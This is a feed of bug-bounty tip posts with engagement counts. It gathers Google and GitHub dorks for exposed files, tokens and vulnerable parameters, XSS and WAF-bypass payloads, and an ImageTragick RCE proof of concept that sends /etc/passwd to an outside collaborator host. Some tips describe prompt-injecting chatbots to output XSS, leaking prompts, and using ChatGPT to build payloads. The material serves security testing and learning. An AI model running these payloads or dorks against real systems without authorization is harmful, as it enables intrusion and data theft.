AI Red Team | Zenity | BT6

Google Dorks - Cloud Storage: site:s3.amazonaws.com "target[.]com" site:blob.core.windows.net "target[.]com" site:googleapis.com "target[.]com" site:drive.google.com "target[.]com" Find buckets and sensitive data #recon #bugbountytips #infosec #seo
78
726
3,108
369,411
Google Dork - all the juicy extensions site:"target[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess
29
695
3,131
269,761
Google Dork - API Endpoints ⚙️ site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3 Find juicy API Endpoints for further testing 🎯
13
321
2,886
263,033
Google Dorks - Part 4: site:jsfiddle.net "target[.]com" site:codebeautify.org "target[.]com" site:codepen.io "target[.]com" site:pastebin.com "target[.]com" Find hidden endpoints and sensitive data #recon #bugbountytips #infosec
65
598
2,795
265,097
Google Dork - Sensitive Docs 📄 ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx intext:“confidential” | intext:“Not for Public Release” | intext:”internal use only” | intext:“do not distribute” Discover internal files 👀
11
277
2,582
296,479
Google Dork I use every time site:target[.]com ext:php
13
270
1,911
204,444
My Top 2 Google Dorks 🐘 PHP ext:php inurl:? site:example[.]com 🤫 Juicy Extensions ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess site:example[.]com
3
299
1,217
98,107
Google Dork - Login Pages 🔑 inurl:login | inurl:signin | intitle:login | intitle:signin | inurl:secure site:example[.]com Find hidden login pages and admin panels 👀
3
126
1,169
117,931
Google Dork - Sensitive Info inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:target[.]com Emails/phone#s/tokens commonly cached directly in Google
13
274
1,071
98,177
Google Dorks - File Storage: site:dropbox.com/s "example[.]com" site:box.com/s "example[.]com" site:docs.google.com inurl:"/d/" "example[.]com" Find sensitive data and company accounts #recon #bugbountytips #infosec #seo
22
228
908
81,446
Google Dorks - Vulnerable Parameters XSS, Open Redirect, SQLi, SSRF, LFI, RCE 🧵
8
114
892
77,333
ChatGPT for bug bounty: 1. Explain JS 2. JS -> Burp Repeater 3. CSRF PoC 4. XSS PoC A thread 🧵👇
26
144
750
78,663
Google Dorks for Bug Bounty Input your target to generate Google Dork links for easy OSINT recon #bugbountytips taksec.github.io/google-dork…
30
248
729
61,479
My favorite Google dorks - Part 2: ext:php inurl:%3F site:*.*.*.<domain> filetype:txt Example: site:tesla .com ext:php #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips #recon
16
163
695
64,837
Google Dorks - Cloud Storage Find exposed files 🧵
8
95
680
57,011
Google Dork - Deep Subdomains site:*.*.*.target[.]com
3
132
678
57,118
Google Dork - XSS parameters inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:target[.]com
13
146
679
114,202
Google Dork - Open Redirect inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:target[.]com
4
158
673
54,540
Google Dork - Apache Server Status Exposed: site:*/server-status apache Find sensitive GET requests w/ CSRF tokens & API keys. #recon #bugbountytips #infosec #seo #bugbounty #hacking
14
202
672
61,469
My favorite Google dork flow: 1. Start w/ "site:<domain>" 2. Remove stuff "-www" 3. Keep reading and removing until you get to the fun stuff Example: site:tesla .com -www -shop -share -ir -mfa #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips #recon #bugbountytip
24
160
661
67,476
Email Subdomain Takeovers by @AdamJSturge A lot of bug hunters aren't checking for these. High Impact - read emails from their domain link.medium.com/fbnJH2Tvpwb #bugbountytips #infosec #recon #hacking
11
225
643
58,399
xsshunter.com / xss.ht are going down starting Feb 1st. Build your own XSS Hunter server w/ this easy script and step-by-step instructions by @AdamJSturge adamjsturge.medium.com/d5a66… #xss #bugbountytips #bugbounty #hacking #infosec
18
226
637
67,798
My favorite XSS payloads: '"><img/src/onerror=prompt()> java%26Tab%3bscript:ale%26Tab%3brt() <iframe src=javascript:alert()// <s<script>cript>alert()</s<script>cript> #xss #bypass #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips
24
157
601
55,802
🪣 AWS S3 Bucket Leaks 🧪 Basic Test 💻 AWS CLI 🔎 Google Dork 🛠️ Tools A thread 🧵👇
12
158
602
95,193
Google Dork - High % inurl keywords inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com Find juicy endpoints and sensitive files #bugbountytips
19
166
583
51,364
Google Dork - File Upload 📁 (site:example[.]com | site:example[.]org) & intext:"choose file”
5
113
584
52,518
XSS filter bypass using stripped </div> tags to obfuscate. Multiple P2 Stored XSS on a private bug bounty program. XSS Payload: <</div>script</div>>alert()<</div>/script</div>> #BugBountyTips #bugbounty #xss @brutelogic
5
239
573
Google Dorks - Cloud Storage #2: site:dev.azure.com "example[.]com" site:onedrive.live.com "example[.]com" site:digitaloceanspaces.com "example[.]com" Find sensitive data and company assets #recon #bugbountytips #infosec #seo
9
140
566
51,096
Google Dorks - Part 5 Other search engines: duckduckgo.com bing.com baidu.com dogpile.com Example: site:tesla[.]com -site:ir.tesla[.]com Find hidden endpoints not on Google #recon #bugbountytips #seo #infosec
12
120
546
61,508
Google Dork - SSRF inurl:http | inurl:proxy= | inurl:html= | inurl:data= | inurl:resource= inurl:& site:target[.]com
3
148
534
44,786
Google Dorks - Cloud Storage: site:s3.amazonaws[.]com "target[.]com" site:blob.core[.]windows[.]net "target[.]com" site:googleapis[.]com "target[.]com" site:drive[.]google[.]com "target[.]com" Find buckets and sensitive data
1
139
491
37,590
XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()// #xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic
6
219
497
Google Dork - Test Environments 👀 site:example[.]com inurl:test | inurl:env | inurl:dev | inurl:staging | inurl:sandbox | inurl:debug | inurl:temp | inurl:internal | inurl:demo Find forgotten endpoints 🎯
1
68
487
25,961
XSS-Bypass Anatomy Final payload after working hours on a bug bounty target w/ both XSS filters & WAF: %0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A
4
147
474
31,849
Google Dork - Find Everything 1️⃣ site:target[.]com 2️⃣ Remove noise w/ negative search: -site:www[.]target[.]com -inurl:news -ir 3️⃣Keep going until you find everything
5
122
464
117,018
My favorite Google dorks - Part 3: OR - Include both queries & - Require both queries intext: - Appears in the page Example: (site:site:tesla. com | teslamotors. com) & intext:"choose file” #bugbountytips #bugbounty #hacking #infosec #recon #seo
11
120
474
43,929
Google Dork - High % inurl keywords inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com
2
123
457
40,769
Google Dork - Open Redirects inurl:(url= | return= | next= | redirect= | redir= | ret= | r2= | page=) inurl:& inurl:http site:example[.]com
3
114
453
30,783
Google Dorks - APIs 🔥 API Endpoints📍 site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3 API Docs 📄 inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com" Find API endpoints for further testing 🔍 Swagger XSS PoC in 🧵
2
92
461
29,909
Google Dork - Publicly Disclosed XSS: site:openbugbounty.org inurl:reports intext:"<target>.com" 1. Bypass previously “fixed” XSS 2. Escalate SSRF w/ unpatched open redirects #recon #xss #bugbountytips #bugbounty #hacking #infosec
14
124
455
42,971
Google Dork - Bug Bounty Programs 💰 inurl:bounty "reward" "scope" "report" -yeswehack -hackerone -bugcrowd -synack -openbugbounty Find bug bounty programs others don't know about 🕵️‍♂️
89
466
24,261
My favorite Burp extensions. Many P1s off the back of these. #bugbounty #bugbountytips #hacking #infosec #cybersecuritytips
7
108
445
Tips for getting into bug bounty and web pentesting: 1. Don't worry about certs, just hack or build something 2. @PortSwigger Web Security Academy: portswigger.net/web-security 3. Hack on a VDP until you get your first vuln 4. Build a tool or web app #bugbountytips #infosec
10
89
430
47,559
Google Dork - Server Errors ⚡ inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com Spot juicy targets 👀
3
64
435
39,655
XSS Bypass - slice + external script Payload: <svg onload=eval(location.hash.slice(1))> Put this at the end of the URL: #with(document)body.appendChild(createElement('script')).src='//domain' More from @brutelogic: brutelogic.com.br/blog/avoid… #xss #bugbountytips #hacking #infosec
7
152
445
48,350
My favorite Recon tools 🔥 Findomain - subdomains httpx - port scan Subjack - subdomain takeovers Nuclei - vuln scan anew - only new stuff Slack webhook - notifications #bugbountytips #recon #bugbounty #infosec #cybersecuritytips #hacking
15
141
436
37,036
XSS Bypass - Stripped Tags Look for anything being removed 🔍 <</div>script</div>>alert()<</div>/script</div>> ⏬ <script>alert()</script> Bypass <script> Blacklist 💥
2
105
422
34,728
XSS Testing Steps for <a> tags: 1️⃣ <a href=https://example[.]com> ✅ 2️⃣ <a href=aaa:bbb> ✅ 3️⃣ <a href=javascript:bbb> ❌ 4️⃣ <a href=jav%26%23x61%3bscript:alert()> 💥 HTML entity to bypass blacklisted protocols #bugbountytips
16
125
413
37,096
Google Dork - RCE Prone Parameters inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example[.]com Find endpoints for RCE testing #bugbountytips
11
126
401
30,695
XSS via Prompt Injection 💥🧠🔓 🤖 Find a chatbot 🧠 Ask what model it is 🔁 Get it to repeat text ⚠️ Make it say: '"><img src=x onerror=alert()> 💥 Escalate to Reflected/Stored XSS via URL param
4
55
430
30,357
Common XSS locations 📍 🔍 Search 👤 Username 🔗 Links ✏️ Text Editor A thread 🧵👇
10
96
384
43,043
ChatGPT - XSS Lab: Having trouble learning some vulnerability class? Just have ChatGPT make you a lab! Details in thread 🧵👇
15
87
392
41,361
Google Dork - API Docs: inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com" Uncover hidden API endpoints 🔍 #recon #bugbountytips #infosec #seo
12
100
385
40,605
Prompt Injections Everywhere 🔥 🔍 Basic Prompt Injection 🔓 Prompt Leak 🎯 Prompt Injection XSS 💉 Prompt Injection SQLi A thread 🧵👇
9
114
382
48,772
XSS Bypass - javascript: URI If you can inject these tags: <a> <iframe> <object> <embed> But, "javascript:" & "data:" are blocked Try these obfuscation techniques: java%00script: java%0Ascript: java&tab;script: Example: <a href="java%0Ascript:al%0Aert()">click</a>
3
103
372
28,456
Google Dork - High % keywords 🚀 inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com Discover exposed endpoints worth investigating 🕵️‍♂️
3
85
376
29,595
Google Dork - Error Pages intext:"error" | intext:"exception" | intext:"not found" | intext:"failed" site:example[.]com
1
76
350
30,770
Google Dork - Find Bug Bounty programs: "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" -inurl:news -site:*.de Last two bits reduce noise, but you can remove them. #bugbountytips #bugbounty #infosec
11
123
370
34,770
Google Dork - SQLi prone parameters inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example[.]com Find endpoints for SQLi testing #bugbountytips
6
95
354
29,257
Upload Scanner Burp Extension RCE, XXE, XSS 1. Find upload http request 2. Send the request to Upload Scanner #bugbountytips #bugbounty #RCE #cybersecuritytips #infosec #hacking
5
80
346
32,940
Google Dork - SSRF Prone Parameters inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com Find endpoints for SSRF testing #bugbountytips
11
110
349
30,481
Easy CSRF I see all the time: 1. In Burp, change request method from POST -> GET 2. Remove CSRF token 3. If PoC works against another user, you have CSRF #bugbountytips #bugbounty #infosec #cybersecuritytips #csrf
10
89
345
35,516
Google Dork - Bug Bounty Programs "reward" "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
5
81
325
30,370
XSS filter bypass: <embed src="javascript%26%63%6f%6c%6f%6e%3balert()"> The url encoded portion is the html entity for colon: &colon; #bugbountytips #bugbounty #XSS
4
125
341
Google Dorks - Code Leaks 💧 site:pastebin. com "example. com" site:jsfiddle. net "example. com" site:codebeautify. org "example. com" site:codepen. io "example. com"
1
50
340
45,593
WPScan - Best Flags 🔥 wpscan --url https://example[.]com --api-token <api token> --plugins-detection mixed -e vp,vt,cb,dbe,u1-10 --force A thread 🧵👇
5
100
329
36,362
XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" Also gets around "javascript" and "alert" blacklist with html entity Tab obfuscation. #BugBountyTips #bugbounty #XSS
1
129
331
Bypass XSS filters for rich text editors like TinyMCE A thread 🧵👇
24
85
324
47,152
XSS Fuzzing w/ ChatGPT Prompt #1: explain this: javascript:alert() Prompt #2: show me alternatives Customize Bypass: list 10 that don't use the word "alert" intact
4
63
320
36,216
🔎 Google Dork - XSS 🔍 inurl:q= | inurl:?s= | inurl:search= | inurl:query= | inurl:lang= | inurl:keyword= inurl:& site:example[.]com Find common parameters vulnerable to XSS #recon #bugbountytips #infosec #seo
16
85
332
23,450
Weird IDOR I've never seen before: 1. User 1 updates at /api/account 2. User 2 registers at /api/register 3. Change userID for /api/register from User 2 -> User 1 🤯 IDOR succeeds - User 2 changes account details of User 1 via registration endpoint #bugbountytips #infosec
13
80
327
26,062
Google Dork - XSS & Open Redirects Disclosed site:openbugbounty[.]org inurl:reports intext:"target[.]"
5
64
315
24,301
SSRF via PDF Generators 🚀 based on the work of @NahamSec and @barbixxxa A thread 🧵👇
5
119
317
37,171
Recon to RCE: Google "upload" site:”target" -> upload form -> ImageTragick MVG -> RCE PoC: push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST xxx.burpcollaborator.net/tes…")' pop graphic-context #BugBountyTips #bugbounty #RCE
2
141
311
New look on the Google Dorking tool! Thank you @wthmanas Link in thread
5
48
301
20,908
Google Dork - Bug Bounty Programs site:*/security.txt "bounty" Find lesser known targets #bugbountytips
7
72
296
76,794
Google Dork - Juicy Endpoints site:target[.]com ext:jsp | ext:asp | ext:aspx | ext:pl | ext:cfm | ext:py | ext:rb
3
83
291
30,332
Blind IDOR 💥 1. Change userID 2. Get 200 status code, but no info leak 3. Check email, SMS, and export files 4. Email notification leaks PII Great write up by @vickieli7 : vickieli.medium.com/how-to-f… #idor #BAC #bugbountytips #bugbounty #hacking #infosec #cybersecuritytips
3
67
302
31,709
Easy Bounty Explained in 🧵 🔍 Google Dork 👀 API endpoint 👾 XSS probe '">< ⚡ Page breaks 🛠️ XSS payload 🚫 Akamai block 🔧 Akamai WAF bypass by @BRuteLogic 💥 XSS alert
3
58
300
29,473
New blog post: Hack rich text editors for XSS This is the method I use anytime I see a rich text editor embedded in a bug bounty or pentesting target. taksec.medium.com/xss-bypass… #xss #bugbountytips #infosec #hacking
4
88
294
33,248
Google Dorks - Extensions: site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess Find sensitive file leaks #bugbountytips #infosec #seo
4
75
285
19,717
Google Dork - XSS parameters inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example[.]com
2
71
279
17,862
P1 IDORs & BAC w/ Auth Analyzer Burp Extension: 1. Copy/paste session cookies from different users 2. Start Analyzer 3. Do things in browser w/ user 1 4. Look at SAME responses for any requests that user 2 can do that should only be accessible for user 1 #bugbountytips #hacking
11
116
295
Google Dorks - Wordpress, Drupal, Joomla inurl:/wp-admin/admin-ajax.php intext:"Powered by" & intext:Drupal & inurl:user site:*/joomla/login #recon #bugbountytips #infosec #seo
1
75
280
22,420
Google Dork - Google Groups ⚙️ site:groups[.]google[.]com "example[.]com" Find juicy Endpoints for further testing 🎯 First saw this from @h4x0r_dz
2
56
278
15,358
Google Dork - Unlisted Bug Bounty Programs 🐛 "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone" reward -site:hackerone[.]com Some programs don't want to be listed in the directory; you can only access them directly via their site.
3
62
270
15,456
Google Dork - LFI Prone Parameters inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example[.]com Find endpoints for LFI testing #bugbountytips
8
81
260
20,084
XSS context to keep 👀 out for - Multiple reflections 2 reflections, 1 input: param = */alert()</script><script>/* 2 reflections, 2 inputs: p1 = <svg/1=' p2 = 'onload=alert()> Credit: @brutelogic More: brutelogic.com.br/blog/multi… #xss #bugbountytips #bugbounty #hacking #infosec
7
93
260
27,268
Google Dorks - Sharepoint & uncommon S3 domains: site:sharepoint.com "example[.]com" site:s3-external-1.amazonaws.com "example[.]com" site:s3.dualstack.us-east-1.amazo… "example[.]com" Discover elusive buckets & sensitive files #recon #bugbountytips #infosec #seo
3
60
254
23,926
ChatGPT for Bug Bounty - XXE: 1. Basic XML 2. SVG 3. Excel A thread 🧵👇
9
69
256
34,350
Github Dorks 1. Slack web hook: "https://hooks.slack[.]com/services/" 2. Slack API token: xoxp OR xoxb 3. Telegram API token: "api_hash" "api_id" 4. shell scripts: language:shell #recon #bugbountytips #infosec
8
72
254
23,057
Google Dork - Test Environments inurl:demo | inurl:dev | inurl:staging | inurl:test | inurl:sandbox site:example[.]com
3
64
251
24,435
Google Dorks - OneDrive, Firebase, and JFrog Artifactory: site:onedrive.live.com "example[.]com" site:firebaseio.com "example[.]com" site:jfrog.io "example[.]com" Find sensitive data and company accounts #recon #bugbountytips #infosec #seo
3
79
240
25,501
Google Dork - All the TLDs site:target.*
7
38
234
25,290
MobSF - Mobile Security Framework 📱🔐 created by @ajinabraham All-in-one mobile pentesting: 🔍Static Analysis 🎯 Dynamic Analysis 🌐 REST API A thread 🧵👇
9
62
230
38,967
GPT-4 XSS payload
6
23
221
28,634
Google Dork - Old Sites site:example[.]com -inurl:https Unexpected results with this one
1
39
223
24,531
Easy CSRF and POST XSS PoC: 1. "Generate CSRF PoC" in Burp 2. Copy HTML 3. Paste into Decoder 4. Encode as Base64 and copy output 5. Paste it to the end of this URI: data:text/html;base64,<Base64 here> 6. Open the link to activate CSRF #bugbountytips #csrf #xss #infosec
5
70
229
19,233
Google Dork - Server Errors ⚡ inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com Spot juicy targets 👀
1
31
233
11,089